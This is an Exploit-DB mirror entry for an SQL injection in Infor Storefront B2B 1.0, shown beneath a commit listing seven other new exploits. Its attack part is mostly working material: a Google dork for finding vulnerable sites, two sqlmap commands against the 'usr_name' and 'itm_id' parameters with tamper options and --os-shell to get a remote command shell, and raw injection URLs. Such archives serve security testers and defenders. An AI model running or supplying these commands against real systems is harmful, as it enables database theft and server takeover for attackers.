exploit-db-mirror/exploits/php/webapps/48674.txt
Offensive Security 8bb6bd8fb0 DB: 2020-07-16
8 changes to exploits/shellcodes

SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
Zyxel Armor X1 WAP6806 - Directory Traversal
Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
Online Polling System 1.0 - Authentication Bypass
Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
2020-07-16 05:02:11 +00:00

37 lines
No EOL
1.1 KiB
Text

# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
# Google Dork: inurl:storefrontb2bweb
# Date: 2020-06-27
# Exploit Author: ratboy
# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
# Version: Infor Storefront
# Tested on: Windows All Versions
[POC Multiple Vulns]
python sqlmap.py -u
"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass"
-p usr_name --dbms=mssql --level=5 --risk=3
--tamper=between,space2comment -o --random-agent --parse-errors
--os-shell --technique=ES
python sqlmap.py -u
"http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1"
-p itm_id --dbms=mssql --level=5 --risk=3
--tamper=between,space2comment -o --random-agent --parse-errors
--os-shell --technique=ES
or...
http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL
INJECTION];--
http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL
INJECTION];--
--
Sincerly,
Aaron Schrom